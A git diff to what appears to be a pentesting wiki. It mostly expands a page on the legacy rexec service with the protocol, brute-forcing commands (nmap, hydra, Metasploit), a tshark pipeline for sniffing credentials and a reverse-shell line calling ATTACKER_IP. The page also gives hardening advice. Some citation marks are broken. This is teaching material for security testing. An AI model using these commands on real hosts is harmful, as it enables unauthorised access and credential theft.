diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md index 2ee072b1270..9c74b3b41fa 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md @@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p * NexMon Magisk ZIP or self-compiled patch providing: * `/system/lib*/libnexmon.so` * `/system/xbin/nexutil` -* Hijacker ≥ 1.7 (arm/arm64) – https://github.com/chrisk44/Hijacker +* Hijacker ≥ 1.7 (arm/arm64) – [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker) * (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools --- @@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2- * [NexMon – firmware patching framework](https://github.com/seemoo-lab/nexmon) * [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 791da2761f0..1f226fae017 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md @@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth ### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md index 4eb74ab92c6..e264e83e0c2 100644 --- a/src/network-services-pentesting/512-pentesting-rexec.md +++ b/src/network-services-pentesting/512-pentesting-rexec.md @@ -2,22 +2,115 @@ {{#include ../banners/hacktricks-training.md}} - ## Basic Information -It is a service that **allows you to execute a command inside a host** if you know valid **credentials** (username and password). +Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …). It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**. The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered **insecure by design**. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests. -**Default Port:** 512 +**Default Port:** TCP 512 (`exec`) ``` PORT STATE SERVICE 512/tcp open exec ``` +> 🔥 All traffic – including credentials – is transmitted **unencrypted**. Anyone with the ability to sniff the network can recover the username, password and command. + +### Protocol quick-look + +1. Client connects to TCP 512. +2. Client sends three **NUL-terminated** strings: + * the port number (as ASCII) where it wishes to receive stdout/stderr (often `0`), + * the **username**, + * the **password**. +3. A final NUL-terminated string with the **command** to execute is sent. +4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output. + +That means you can reproduce the exchange with nothing more than `echo -e` and `nc`: + +```bash +(echo -ne "0\0user\0password\0id\0"; cat) | nc 512 +``` + +If the credentials are valid you will receive the output of `id` straight back on the same connection. + +### Manual usage with the client + +Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package: + +```bash +rexec -l user -p password "uname -a" +``` + +If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!). + +--- +## Enumeration & Brute-forcing + ### [**Brute-force**](../generic-hacking/brute-force.md#rexec) +### Nmap -{{#include ../banners/hacktricks-training.md}} +```bash +nmap -p 512 --script rexec-info +# Discover service banner and test for stdout port mis-configuration + +nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" +``` +The `rexec-brute` NSE uses the protocol described above to try credentials very quickly . +### Hydra / Medusa / Ncrack +```bash +hydra -L users.txt -P passwords.txt rexec:// -s 512 -t 8 +``` +`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer . `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way. +### Metasploit + +``` +use auxiliary/scanner/rservices/rexec_login +set RHOSTS +set USER_FILE users.txt +set PASS_FILE passwords.txt +run +``` +The module will spawn a shell on success and store the credentials in the database . + +--- +## Sniffing credentials + +Because everything is clear-text, **network captures are priceless**. With a copy of the traffic you can extract creds without touching the target: + +```bash +tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \ + awk -F"\\0" '{print $2":"$3" -> "$4}' # username:password -> command +``` + +(In Wireshark enable *Decode As …​* TCP 512 → REXEC to view nicely-parsed fields.) + +--- +## Post-Exploitation tips + +* Commands run with the privileges of the supplied user. If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible. +* Rexec ignores the user’s shell and executes the command via `/bin/sh -c `. You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells: + ```bash + rexec -l user -p pass 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"' + ``` +* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement. + +--- +## Hardening / Detection + +* **Do not expose rexec**; replace it with SSH. Virtually all modern *inetd* superservers comment the service out by default. +* If you must keep it, restrict access with TCP wrappers (`/etc/hosts.allow`) or firewall rules and enforce strong per-account passwords. +* Monitor for traffic to :512 and for `rexecd` process launches. A single packet capture is enough to detect a compromise. +* Disable `rexec`, `rlogin`, `rsh` together – they share most of the same codebase and weaknesses. + +--- + + +## References + +* Nmap NSE `rexec-brute` documentation – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html) +* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login) +{{#include ../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 31ca7a6ae15..5eb9580d6e3 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with -{{#include /banners/hacktricks-training.md}} +{{#include ../banners/hacktricks-training.md}}